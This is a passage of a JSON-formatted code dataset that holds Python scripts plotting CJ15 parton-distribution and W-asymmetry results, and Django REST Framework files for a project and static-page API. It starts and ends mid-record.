fig = py.gcf()\n box = ax.get_position()\n transFigure = fig.transFigure.inverted()\n width = box.width/2\n height = box.height\n \n # create axL\n inax_position = ax.transAxes.transform([0,0])\n infig_position = transFigure.transform(inax_position) \n x = infig_position[0]\n y = infig_position[1]\n axL = fig.add_axes([x,y,width,height],axisbg=axisbg)\n axL.spines['right'].set_visible(False)\n axL.get_yaxis().tick_left()\n \n # create axR\n inax_position = ax.transAxes.transform([0.5,0])\n infig_position = transFigure.transform(inax_position) \n x = infig_position[0]\n y = infig_position[1]\n axR = fig.add_axes([x,y,width,height],axisbg=axisbg)\n axR.get_yaxis().tick_left()\n axR.spines['left'].set_visible(False)\n axR.axes.yaxis.set_ticklabels([])\n axR.axes.get_yaxis().set_ticks([])\n \n self.axL=axL\n self.axR=axR\n\n def plot(self,X,Y,*args,**kwargs):\n\n # break the arrays for L&R\n I=-1\n for i in range(len(X)):\n if X[i]>=0.1: \n I=i\n break\n XL,YL=X[:I+1],Y[:I+1]\n XR,YR=X[I:],Y[I:]\n\n # plot arrays\n self.axR.plot(XR,YR,*args,**kwargs)\n self.axL.plot(XL,YL,*args,**kwargs) \n\n # set y-limits\n y1=np.amin(Y)\n y2=np.amax(Y)\n\n if self.is_ylim_set==False:\n self.y1_=y1\n self.y2_=y2\n self.is_ylim_set=True\n else:\n self.y1_=np.amin([y1,self.y1_])\n self.y2_=np.amax([y2,self.y2_])\n\n self.axL.set_ylim(self.y1_,self.y2_)\n self.axR.set_ylim(self.y1_,self.y2_)\n\n # set x-limits\n self.axL.set_xlim(XL[0],0.1)\n self.axR.set_xlim(0.1,XR[-1])\n\n self.axR.set_xticks([0.3,0.5,0.7,0.9])\n self.axL.semilogx()\n\n def set_ylabel(self,text,displace=-0.15,**kwargs):\n self.axL.set_ylabel(text)\n self.axL.yaxis.set_label_coords(displace,0.5)\n\n def set_xlabel(self,text,displace=-0.1,**kwargs):\n self.axL.set_xlabel(text)\n self.axL.xaxis.set_label_coords(1.0,displace)\n\n def tick_params(self,*args,**kwargs):\n self.axL.tick_params(*args,**kwargs)\n self.axR.tick_params(*args,**kwargs)\n\n def set_title(self,*args,**kwargs):\n self.axL.set_title(*args,**kwargs)\n\n def legend(self,*args,**kwargs):\n if any([k=='loc' for k in kwargs.keys()]):\n if kwargs['loc']==1 or kwargs['loc']==4: self.axR.legend(**kwargs)\n if kwargs['loc']==2 or kwargs['loc']==3: self.axL.legend(**kwargs)\n else:\n self.axR.legend(**kwargs)\n\n def set_ylim(self,*args):\n self.axL.set_ylim(*args)\n self.axR.set_ylim(*args)\n\n def axhline(self,**kwargs):\n self.axL.axhline(**kwargs)\n self.axR.axhline(**kwargs)\n\n\nif __name__==\"__main__\":\n\n ax=py.subplot(111)\n SA=SPLIT_AX(ax)\n X=10**np.linspace(-5,-1,100)\n X=np.append(X,np.linspace(0.1,1,100))\n Y=X*(1-X)\n SA.plot(X,Y)\n py.savefig('plot.pdf')\n\n\n\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.4745098054409027, "alphanum_fraction": 0.5715686082839966, "avg_line_length": 28.14285659790039, "blob_id": "ec4f0442b8b3ca73d0f1f461546c7e495f0d53d8", "content_id": "0b76f40ec670ffeed6fa67bd767d975555a864b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1020, "license_type": "no_license", "max_line_length": 65, "num_lines": 35, "path": "/sharespace/codes/ht.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\n\nD={}\nD['AV18'] ={'h':[-3.0094,1.7526,-2.0895] ,'c':'r','ls':'-'} \nD['CDBonn']={'h':[-2.9851,1.7564,-2.0856] ,'c':'g','ls':'--'}\nD['WJC1'] ={'h':[-3.2169,1.8225,-2.0844],'c':'k','ls':'-.'}\nD['WJC2'] ={'h':[-3.0403,1.7605,-2.0898] ,'c':'b','ls':':'}\n\nf=lambda x,h: h[0] * x**h[1] * (1+h[2]*x)\nX=np.linspace(0,1,100)\nax=py.subplot(111)\nfor k in ['AV18','CDBonn','WJC1','WJC2']:\n ax.plot(X,f(X,D[k]['h']),\\\n color=D[k]['c'],\\\n lw=2.0,\\\n ls=D[k]['ls'],\\\n label=tex(k)\n )\nax.set_ylim(-0.5,2)\nax.set_ylabel(r'$C_{\\rm HT}$',size=30)\nax.set_xlabel('$x$',size=30)\nax.axhline(0,color='k',ls='-',alpha=0.2)\nax.legend(frameon=0,loc=2,fontsize=25)\npy.tick_params(axis='both',labelsize=25)\npy.tight_layout()\npy.savefig('gallery/ht.pdf')\n" }, { "alpha_fraction": 0.49593496322631836, "alphanum_fraction": 0.5394132137298584, "avg_line_length": 25.19444465637207, "blob_id": "7d265f787c0989b187dfb3dfb44377cdbc41f290", "content_id": "7201d0b34c9e096cbb690c0dd730e2c7af2d4f05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2829, "license_type": "no_license", "max_line_length": 86, "num_lines": 108, "path": "/sharespace/codes/F2d_F2.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nimport pandas as pd\n\nclass F2ratio(object):\n\n def __init__(self):\n self.load_data()\n self.make_plotI()\n self.make_plotII()\n\n def _load_data(self,name):\n D=self.D\n F=open('../CJ15data/FITS_150701_LO_NLO/calc_NLO_KP_'+name+'.out')\n L=F.readlines()\n F.close()\n L=[l.strip() for l in L]\n L=[l for l in L if l!='']\n data=[l.replace('*','').split() for l in L if 'test_DN' in l if len(l.split())<25]\n for l in L:\n if all([k in l for k in ['X','Q2','W2','THEORY']]):\n H=l.replace('_w','').replace(r'chi^2','').split()\n DF=pd.DataFrame(data,columns=H)\n DF=DF.convert_objects(convert_numeric=True)\n D[name]=DF\n\n def load_data(self):\n self.D={}\n self._load_data('AV18')\n self._load_data('CDBONN')\n self._load_data('WJC1')\n self._load_data('WJC2')\n\n def make_plotI(self):\n # retrieve data\n D=self.D\n\n kmap={}\n kmap['AV18'] = {'c':'r','ls':'-'}\n kmap['CDBONN'] = {'c':'g','ls':'--'}\n kmap['WJC1'] = {'c':'k','ls':'-.'}\n kmap['WJC2'] = {'c':'b','ls':':'}\n\n ax=py.subplot(111)\n for k in ['AV18','CDBONN','WJC1','WJC2']:\n DF=D[k]\n DF=DF[DF.Q2==10]\n if k=='CDBONN':\n label='CDBonn'\n else:\n label=k\n cls=kmap[k]['c']+kmap[k]['ls']\n ax.plot(DF.X,DF.THEORY,cls,lw=2.0,label=tex(label))\n\n ax.set_xlabel('$x$',size=25)\n ax.set_ylabel(r'$F_2^d\\, /\\, F_2^N$',size=25)\n ax.set_ylim(0.97,1.08)\n ax.axhline(1,color='k',ls='-',alpha=0.2)\n\n ax.legend(frameon=0,loc=2,fontsize=22)\n py.tick_params(axis='both',labelsize=22)\n py.tight_layout()\n py.savefig('gallery/F2d_F2_I.pdf')\n py.close()\n\n def make_plotII(self):\n # retrieve data\n D=self.D\n\n kmap={}\n kmap['Q2 = 2'] = {'c':'r','ls':'-'}\n kmap['Q2 = 5'] = {'c':'g','ls':'--'}\n kmap['Q2 = 10'] = {'c':'b','ls':'-.'}\n kmap['Q2 = 100'] = {'c':'k','ls':':'}\n\n\n ax=py.subplot(111)\n DF=D['AV18']\n for Q2 in [2,5,10,100]:\n k='Q2 = %d'%Q2\n Q2=float(k.split('=')[1])\n DF=D['AV18'][D['AV18'].Q2==Q2]\n cls=kmap[k]['c']+kmap[k]['ls']\n ax.plot(DF.X,DF.THEORY,cls,lw=2.0,label=r'$Q^2=%0.0f~{\\rm GeV}^2$'%Q2)\n\n ax.set_xlabel('$x$',size=25)\n ax.set_ylabel(r'$F_2^d\\, /\\, F_2^N$',size=25)\n ax.set_ylim(0.97,1.08)\n ax.axhline(1,color='k',ls='-',alpha=0.2)\n\n ax.legend(frameon=0,loc=2,fontsize=22)\n py.tick_params(axis='both',labelsize=22)\n py.tight_layout()\n py.savefig('gallery/F2d_F2_II.pdf')\n\nif __name__=='__main__':\n\n F2ratio()\n" }, { "alpha_fraction": 0.5400665402412415, "alphanum_fraction": 0.5932869911193848, "avg_line_length": 24.423076629638672, "blob_id": "8cddf862c5c2bef4b7d54396afc73ade6ecaa18a", "content_id": "c86ec821ec2ff78ccad5698a4d2385b8bfe14b5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3307, "license_type": "no_license", "max_line_length": 78, "num_lines": 130, "path": "/sharespace/codes/other/simple.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import FITPACK\n\n\n# initialize PDF instances\nHERA15=lhapdf.mkPDFs('HERAPDF15LO_EIG')\nMMHT14=lhapdf.mkPDFs('MMHT2014lo68cl')\nMSTW08=lhapdf.mkPDFs('MSTW2008lo68cl')\n\n# dictionary for pdg flav idx\npdgmap= {'u':2,'d':1,'ub':-2,'db': -1,'s':3,'g':21}\n\n# simple function to access lhad pdfs\nget_pdfs = lambda flav,x,Q2,iset,grp: grp[iset].xfxQ2(pdgmap[flav],x,Q2)\n\n# load CJ15 from fitpack data \nfname='data/CDBONN_KP_1_LO_6.pdf'\nCJ15=FITPACK().get_PDFs(fname)\n\n# dictionary for labels\nlabmap = {}\nlabmap['u'] = '$xu(x)$'\nlabmap['d'] = '$xd(x)$'\nlabmap['ub'] = r'$x\\bar{u}(x)$'\nlabmap['db'] = r'$x\\bar{d}(x)$'\nlabmap['s'] = '$xs(x)$'\nlabmap['g'] = '$xg(x)$'\n\n# dictionary for grp == groups \ngrpmap = {}\ngrpmap['HERA15'] = {'grp':HERA15,'color':'g-'}\ngrpmap['MMHT14'] = {'grp':MMHT14,'color':'b-'}\ngrpmap['MSTW08'] = {'grp':MSTW08,'color':'b:'}\n\n# dictionary for ylims \nymap={}\nymap['u'] ={'min':0.0,'max':0.8}\nymap['d'] ={'min':0.0,'max':0.6}\nymap['ub']={'min':0.0,'max':0.6}\nymap['db']={'min':0.0,'max':0.6}\nymap['s'] ={'min':0.0,'max':0.6}\nymap['g'] ={'min':0.0,'max':20.0}\n\n# dictionary for plot location \ngs = gridspec.GridSpec(3,2) # specify plotting grid geometry\ngs.update(left=0.1,right=0.98,wspace=0.3,hspace=0.1,top=0.98,bottom=0.1)\ngrid={}\ngrid['u'] = gs[0,0]\ngrid['d'] = gs[0,1]\ngrid['ub']= gs[1,0]\ngrid['db']= gs[1,1]\ngrid['s'] = gs[2,0]\ngrid['g'] = gs[2,1]\n\n\n# setup kinematics\nQ2=10.0\niset=0\n\n\n# make plot\nfor flav in ['u','d','ub','db','s','g']:\n\n ax=py.subplot(grid[flav])\n\n for grp in ['CJ15','HERA15','MMHT14','MSTW08']:\n\n if grp=='CJ15':\n X=CJ15['Q2'][Q2]['X']\n central=CJ15['Q2'][Q2]['x'+flav]\n error=CJ15['Q2'][Q2]['err-x'+flav]*10\n\n #args={} \n #args['ax']=ax\n #args['x']=X\n #args['central']=central\n #args['lower']=central-error\n #args['upper']=central+error\n #args['central color']='r'\n #args['central line style']='-'\n #args['band color']='#FFFF00'\n #args['label']=tex(grp)\n #CJ_Legend = plot_band(args)\n p1,=ax.plot(X,central,'r-')\n p2=fill_between(X,central-error,central+error,ax=ax,\n facecolor='#FFFF00',\n edgecolor='#FFFF00',\n alpha=1.0,hatch=None)\n\n else:\n X=np.linspace(1e-3,0.9,1000)\n grp_=grpmap[grp]['grp']\n col=grpmap[grp]['color']\n ax.plot(X,[get_pdfs(flav,x,Q2,iset,grp_) for x in X],col,label=tex(grp))\n\n # make legend\n if flav=='g': \n H_,L_ = ax.get_legend_handles_labels()\n H=[(p2,p1)]\n L=[tex('CJ15')]\n for h in H_: H.append(h)\n for l in L_: L.append(l)\n ax.legend(H,L,loc=1,frameon=0,fontsize=15)\n\n # setup axis\n ax.semilogx()\n ax.set_xlim(1e-3,1.0)\n ax.set_ylim(ymap[flav]['min'],ymap[flav]['max'])\n if flav!='s' and flav!='g': ax.set_xticks([])\n ax.set_xlabel('$x$',size=20)\n ax.set_ylabel(labmap[flav],size=20)\n\n ## write info\n if flav=='u': \n ax.text(0.1,0.1,'$Q^2=$'+tex('~10~GeV^2~LO'),\n transform=ax.transAxes,size=15)\n\n\npy.savefig('plots/LOfits.pdf')\n\n\n" }, { "alpha_fraction": 0.5482555627822876, "alphanum_fraction": 0.5777072906494141, "avg_line_length": 24.367816925048828, "blob_id": "a6cb158b3fc9ec8fcc95a97f3bef1c7cfa2acb4d", "content_id": "4e6cb261e787a0b2fd34fcd85684c9eab32d7d08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2207, "license_type": "no_license", "max_line_length": 74, "num_lines": 87, "path": "/sharespace/codes/Wasy.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nimport pandas as pd\nfrom scipy.interpolate import interp1d\n\nclass WASY(object):\n\n def __init__(self):\n self.load_data()\n self.make_plot()\n\n def load_data(self):\n F=open('../CJ15data/CJ15_NLO_KP_AV18/CJ15_Wasym.dat')\n L=F.readlines()\n F.close()\n L=[l.strip() for l in L]\n L=[l for l in L if l!='']\n H=L[0].split()\n L=[l.split() for l in L[1:]]\n DF=pd.DataFrame(L,columns=H)\n DF=DF.convert_objects(convert_numeric=True)\n\n D={}\n D['CDF_Wasy'] = DF[DF.ITYPE=='CDF_Wasy']\n D['D0_Wasy'] = DF[DF.ITYPE=='D0_Wasy']\n self.D=D\n\n def make_plot(self):\n D=self.D\n ax=py.subplot(111)\n\n Y=D['D0_Wasy']['Y']\n T=D['D0_Wasy']['THEORY']\n ET=D['D0_Wasy']['ERROR']\n\n iT= interp1d(Y,T,kind='cubic')\n iET= interp1d(Y,ET, kind='cubic')\n Y=np.linspace(np.amin(Y),np.amax(Y),100)\n\n T=10\n p2=fill_between(Y,iT(Y)-iET(Y)*T,iT(Y)+iET(Y)*T,\n ax=ax,\n facecolor='yellow', \n edgecolor='yellow')\n p1,=ax.plot(Y,iT(Y),'r-')\n H=[(p2,p1)] \n L=[tex('CJ15')]\n\n dmap={}\n dmap['CDF_Wasy'] = {'color':'g','marker':'o'}\n dmap['D0_Wasy'] = {'color':'b','marker':'^'}\n\n for k in D.keys():\n color=dmap[k]['color']\n marker=dmap[k]['marker']\n markersize=4\n p3=ax.errorbar(D[k]['Y'],D[k]['DATA'],\\\n yerr=D[k]['DERROR'],fmt=color+marker,mfc=color,mec=color,\\\n markersize=markersize,zorder=1,alpha=0.9)\n H.append(p3)\n L=[tex('CJ15'),tex('CDF'),tex('D\\O')]\n\n ax.set_xlabel(r'$y_W$',size=25) \n ax.set_ylabel(r'$A_W$',size=25)\n\n ax.legend(H,L,frameon=0,loc=3,fontsize=22,numpoints=1,\\\n bbox_to_anchor=(0.02, 0.65))\n \n ##ax.text(0.5,0.8,tex('nrep=%d'%nrows),transform=ax.transAxes,size=20)\n py.tick_params(axis='both',labelsize=20)\n py.tight_layout()\n py.savefig('gallery/Wasy.pdf')\n py.close()\n\nif __name__=='__main__':\n\n WASY()\n" }, { "alpha_fraction": 0.5655391216278076, "alphanum_fraction": 0.6099365949630737, "avg_line_length": 20.386363983154297, "blob_id": "0108cc1bdc9ae918dc2dcb80ef07b0dced503748", "content_id": "206ade0d31fed0134ceceeb540b19ab0a6677eb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 946, "license_type": "no_license", "max_line_length": 63, "num_lines": 44, "path": "/sharespace/codes/other/db_ub.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import COMPOSER,FITPACK\n\ndef main():\n\n T=10\n Q2=100\n X=np.linspace(1e-3,0.4)\n\n CJ=COMPOSER(name='CJ15_NLO_KP_AV18')\n d=CJ.get_xpdf('db-ub',X=X,Q2=Q2)\n\n ax=py.subplot(111)\n p1,=ax.plot(X,d['xf0']/X,color='r',ls='-')\n p2=fill_between(X,\n (d['xf0']-d['dxf-']*T)/X,\n (d['xf0']+d['dxf+']*T)/X,\n ax=ax,\n facecolor='r',\n edgecolor='none',\n alpha=0.5)\n\n H=[(p2,p1)]\n L=[tex('CJ15')+'\\ $(T=%d)$'%T]\n ax.legend(H,L,loc=1,frameon=0,fontsize=20)\n ax.set_ylim(-0.2,1.2)\n ax.axhline(0,ls='--',color='k',alpha=0.5)\n\n py.savefig('gallery/db_ub.pdf')\n\nif __name__=='__main__':\n\n main()\n\n\n\n\n\n" }, { "alpha_fraction": 0.5476884841918945, "alphanum_fraction": 0.5897542834281921, "avg_line_length": 24.817203521728516, "blob_id": "6f9544d6a1e4e651ac6f3b36380dae885656c0af", "content_id": "8ae19f479a4809ba5f51d00ba9693ad2c33d3cb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2401, "license_type": "no_license", "max_line_length": 73, "num_lines": 93, "path": "/sharespace/codes/wasy_NS.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nimport pandas as pd\n\nclass WASY(object):\n\n def __init__(self):\n self.load_data()\n self.define_plotter_geometry()\n self.make_plot()\n\n def load_data(self):\n F=open('../CJ15data/CJ15_NLO_KP_AV18/CJ15_Wasym.dat')\n L=F.readlines()\n F.close()\n L=[l.strip() for l in L]\n L=[l for l in L if l!='']\n H=L[0].split()\n L=[l.split() for l in L[1:]]\n DF=pd.DataFrame(L,columns=H)\n DF=DF.convert_objects(convert_numeric=True)\n\n D={}\n D['cdfLasy05'] = DF[DF.ITYPE=='cdfLasy05']\n D['d0Lasy_e15']= DF[DF.ITYPE=='d0Lasy_e15']\n D['d0Lasy13'] = DF[DF.ITYPE=='d0Lasy13']\n D['CDF_Wasy'] = DF[DF.ITYPE=='CDF_Wasy']\n D['D0_Wasy'] = DF[DF.ITYPE=='D0_Wasy']\n self.D=D\n\n def define_plotter_geometry(self):\n\n ncols=2\n nrows=3\n py.figure(figsize=(ncols*4,nrows*3))\n gs = gridspec.GridSpec(nrows,ncols)\n gs.update(left=0.13,right=0.98,wspace=0.4,hspace=0.3,\\\n top=0.98,bottom=0.12)\n \n AX={}\n AX['cdfLasy05'] = py.subplot(gs[0,0])\n AX['d0Lasy_e15'] = py.subplot(gs[0,1])\n AX['d0Lasy13'] = py.subplot(gs[1,0])\n AX['CDF_Wasy'] = py.subplot(gs[1,1])\n AX['D0_Wasy'] = py.subplot(gs[2,0])\n self.AX=AX\n\n def plot_dataset(self,dataset,T=10):\n k=dataset\n D=self.D\n ax=self.AX[k]\n data=D[k]['DATA']\n derr=D[k]['DERROR']\n theory=D[k]['THEORY']\n terr=D[k]['ERROR']\n y=D[k]['Y']\n p1,=ax.plot(y,theory,'r-')\n p2=fill_between(y,theory-terr*T,theory+terr*T,\n ax=ax,\n facecolor='yellow',\n edgecolor='yellow')\n p3=ax.errorbar(y,data,yerr=derr,fmt='k.')\n return (p2,p1),p3\n\n def make_plot(self):\n AX=self.AX\n for k in AX.keys(): \n p21,p3=self.plot_dataset(k)\n AX[k].set_xlabel(r'$y$',size=20)\n AX[k].set_ylabel(tex(k.replace('_','')),size=20)\n\n ax=AX['cdfLasy05']\n ax.legend([p21,p3],[tex('CJ15'),tex('data')]\\\n ,frameon=0,loc=3,fontsize=20,numpoints=1)\n\n \n #ax.text(0.5,0.8,tex('nrep=%d'%nrows),transform=ax.transAxes,size=20)\n py.savefig('gallery/wasy.pdf')\n py.close()\n\nif __name__=='__main__':\n\n WASY()\n" } ]
21
multiplayground/mlp_api
https://github.com/multiplayground/mlp_api
a0894a633717b0ff3caa6872d8fe9849df95a27e
b65b1651d45f6cb1552a020bae51b125357ee47b
28c5654a9efab56cd4559b9e69d6e24ff9b6d28b
refs/heads/master
2020-05-18T00:16:15.989855
2019-05-02T05:42:37
2019-05-02T05:42:37
184,056,910
1
3
null
2019-04-29T11:18:01
2019-05-19T18:43:07
2020-02-12T00:10:18
Python
[ { "alpha_fraction": 0.5735455751419067, "alphanum_fraction": 0.5867179036140442, "avg_line_length": 25.808822631835938, "blob_id": "47c72c0aa25245b0fb6df9775a4efebe1a8ee8ea", "content_id": "82b81fdfe237ee1d3adaabf76c81dcc8d140ffe3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1822, "license_type": "no_license", "max_line_length": 77, "num_lines": 68, "path": "/staticPageApp/models.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.template.defaultfilters import truncatechars\n\nfrom pytils.translit import slugify\nfrom tinymce.models import HTMLField\n\n\nclass Page(models.Model):\n \"\"\" Page Class is designed to create separate Pages of this Project. \"\"\"\n\n title = models.CharField(\n _('title'),\n max_length=255,\n unique=True,\n help_text=_(\"At most 255 characters.\")\n )\n slug = models.SlugField(\n _('slug'),\n max_length=128,\n blank=True,\n unique=True,\n help_text=_(\"At most 128 characters, allowed characters:'-_a-z0-9'.\")\n )\n seo_description = models.CharField(\n _('seo description'),\n max_length=100,\n help_text=_(\"At most 100 characters.\")\n )\n content = HTMLField(\n _('content')\n )\n data_of_created = models.DateTimeField(\n _('data of create'),\n auto_now_add=True,\n auto_now=False\n )\n data_of_updated = models.DateTimeField(\n _('data of updated'),\n auto_now_add=False,\n auto_now=True\n )\n is_activate = models.BooleanField(\n _('is activate'),\n default=True\n )\n\n class Meta:\n verbose_name = _(\"static page\")\n verbose_name_plural = _(\"static pages\")\n\n def save(self, *args, **kwargs):\n \"\"\"\n If the field is not filled when saving, it is automatically\n filled with the page header of the page\n \"\"\"\n self.slug = slugify(self.title)\n super(Page, self).save(*args, **kwargs)\n\n def short_title(self):\n \"\"\"\n The function of limiting the length of the page header to\n 50 characters\n \"\"\"\n return truncatechars(self.title, 50)\n\n def __str__(self):\n return self.title" }, { "alpha_fraction": 0.6693548560142517, "alphanum_fraction": 0.6693548560142517, "avg_line_length": 30, "blob_id": "632c800bc5f1d0209b65f7c70f6a280be0076d94", "content_id": "250db4dcab59a72a4d88cc5d8254e0dcb6f6443b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 372, "license_type": "no_license", "max_line_length": 56, "num_lines": 12, "path": "/projectApp/permissions.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from rest_framework import permissions\n\nclass IsAdminUserOrReadOnly(permissions.BasePermission):\n \"\"\"\n Allows retrieve API data to any user, and\n create or destroy it only to administrators.\n \"\"\"\n def has_permission(self, request, view):\n return (\n request.user.is_staff or\n request.method in permissions.SAFE_METHODS\n )\n" }, { "alpha_fraction": 0.5439469218254089, "alphanum_fraction": 0.5439469218254089, "avg_line_length": 22.230770111083984, "blob_id": "fe14c398c487e590ebb4899f815afee21a33319b", "content_id": "7566815122e7da8c45bda51dfacafb1072eac073", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 603, "license_type": "no_license", "max_line_length": 60, "num_lines": 26, "path": "/staticPageApp/admin.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Page\n\n\n@admin.register(Page)\nclass PageAdmin(admin.ModelAdmin):\n list_display = (\n 'id',\n 'short_title',\n 'slug',\n 'is_activate',\n 'data_of_updated',\n 'data_of_created'\n )\n list_display_links = ('short_title',)\n list_filter = ('is_activate',)\n readonly_fields = ('data_of_updated', 'data_of_created')\n fields = (\n 'title',\n 'slug',\n 'seo_description',\n 'content',\n 'is_activate',\n ('data_of_updated', 'data_of_created')\n )\n save_on_top = True" }, { "alpha_fraction": 0.7674418687820435, "alphanum_fraction": 0.7713178396224976, "avg_line_length": 22.454545974731445, "blob_id": "40790756a62d9b192825c459ba1f661e1d164385", "content_id": "719fdf723086623aeeea771d08bc7b6baa071c43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 258, "license_type": "no_license", "max_line_length": 43, "num_lines": 11, "path": "/projectApp/urls.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from django.urls import include, path\nfrom rest_framework import routers\nfrom projectApp.views import ProjectViewSet\n\n\nrouter = routers.DefaultRouter()\nrouter.register(r'project', ProjectViewSet)\n\nurlpatterns = [\n path('api/v1/', include(router.urls)),\n]\n" }, { "alpha_fraction": 0.6076260805130005, "alphanum_fraction": 0.6076260805130005, "avg_line_length": 29.873416900634766, "blob_id": "aadf9454e864366a7f9cf208ff89f76eab17b7a1", "content_id": "80d38cdf8e3c046a5c97e36b980c006e7492850c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2439, "license_type": "no_license", "max_line_length": 73, "num_lines": 79, "path": "/projectApp/serializers.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom projectApp.models import Project, Tag, Status\n\n\nclass TagSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tag\n fields = ('title', 'slug')\n extra_kwargs = {\n 'title': {'validators': []},\n 'slug': {'validators': []}\n }\n\nclass StatusSerializer(serializers.ModelSerializer):\n class Meta:\n model = Status\n fields = ('title', )\n extra_kwargs = {'title': {'validators': []}}\n\nclass ProjectSerializer(serializers.ModelSerializer):\n status = StatusSerializer()\n tags = TagSerializer(many=True)\n\n class Meta:\n model = Project\n fields = '__all__'\n\n # Validation of relational fields:\n\n def validate_status(self, status_data):\n title = status_data['title']\n if not Status.objects.filter(title=title).exists():\n issue = \"Status '%s' doesn't exist.\" % title\n raise serializers.ValidationError(issue)\n\n return status_data\n\n def validate_tags(self, tag_data_list):\n wrong_tags = []\n\n for tag_data in tag_data_list:\n title, slug = tag_data.values()\n if not Tag.objects.filter(title=title, slug=slug).exists():\n wrong_tags.append(title)\n\n if not wrong_tags:\n return tag_data_list\n\n issue = \"Problem with next tags: '%s'\" % \", \".join(wrong_tags)\n raise serializers.ValidationError(issue)\n\n # Setting write methods explicitly:\n\n def create(self, validated_data):\n status_data = validated_data.pop('status')\n tags_data = validated_data.pop('tags')\n\n status = Status.objects.get(**status_data)\n tags = [Tag.objects.get(**td) for td in tags_data]\n\n project = Project.objects.create(**validated_data, status=status)\n project.tags.set(tags)\n return project\n\n def update(self, instance, validated_data):\n status_data = validated_data.pop('status')\n tags_data = validated_data.pop('tags')\n\n status = Status.objects.get(**status_data)\n tags = [Tag.objects.get(**td) for td in tags_data]\n\n instance.status = status\n instance.tags.set(tags)\n for key, value in validated_data.items():\n setattr(instance, key, value)\n\n updated_fields = ['status'] + list(validated_data.keys())\n instance.save(update_fields=updated_fields)\n return instance\n" }, { "alpha_fraction": 0.7798742055892944, "alphanum_fraction": 0.7798742055892944, "avg_line_length": 33.07143020629883, "blob_id": "2ce90175c2757d87f344f4fbde40dc5fc5f3c3fd", "content_id": "d2581d0905cfce79f837211474f1df47b9abfee0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 477, "license_type": "no_license", "max_line_length": 58, "num_lines": 14, "path": "/projectApp/views.py", "repo_name": "multiplayground/mlp_api", "src_encoding": "UTF-8", "text": "from rest_framework import viewsets\nfrom projectApp.models import Project\nfrom projectApp.serializers import ProjectSerializer\nfrom projectApp.permissions import IsAdminUserOrReadOnly\n\n\nclass ProjectViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = Project.objects.filter(is_active=True)\n serializer_class = ProjectSerializer\n permission_classes = (IsAdminUserOrReadOnly,)\n lookup_field = 'slug'\n" }, { "alpha_fraction": 0.5482233762741089, "alphanum_fraction": 0.720812201499939, "avg_line_length": 16.909090042114258, "blob_id": "6f4c227ad178acd6d554159a131048752ee0731a", "content_id": "e11939b0eb24f32997e1f13f25c36a9c613f4f83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 197, 